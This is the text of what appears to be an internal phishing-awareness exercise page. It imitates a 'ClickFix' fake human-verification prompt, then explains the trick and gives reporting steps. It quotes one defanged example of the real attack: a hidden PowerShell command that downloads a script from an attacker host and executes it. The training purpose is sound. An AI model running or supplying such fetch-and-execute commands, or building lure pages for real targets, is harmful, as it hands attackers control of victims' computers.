Your session could not be validated automatically. Complete the manual step below to confirm you are a real person and restore access.
verification-token-8f3c1a90 # paste to confirm you are humanProtected by automated account security. Do not close this window.
Nothing was installed and nothing ran. This page is part of an authorized security-awareness exercise. But if this had been a real attacker, following those three steps is all it would have taken to hand them control of your computer.
That “verification code” is not a code. On a real ClickFix page the clipboard is quietly loaded with a command, so when you paste it into Run and press Enter, you execute the attacker's code on your own machine, from your own account, past most defenses that assume malware arrives as a file. On a real one it looks like this:
powershell -w hidden -c "irwr hxxps://<attacker>/x | iex"
1. Do not paste or run anything. Close the page.
2. Report it. Forward the message or use the Report Phish button, and contact the security team.
3. If you already ran a command, that is okay, tell security right away so they can help. Reporting fast is the win, not avoiding the mistake.
This was an authorized internal exercise.
No data was collected beyond that this training page was reached. Questions go to your security team.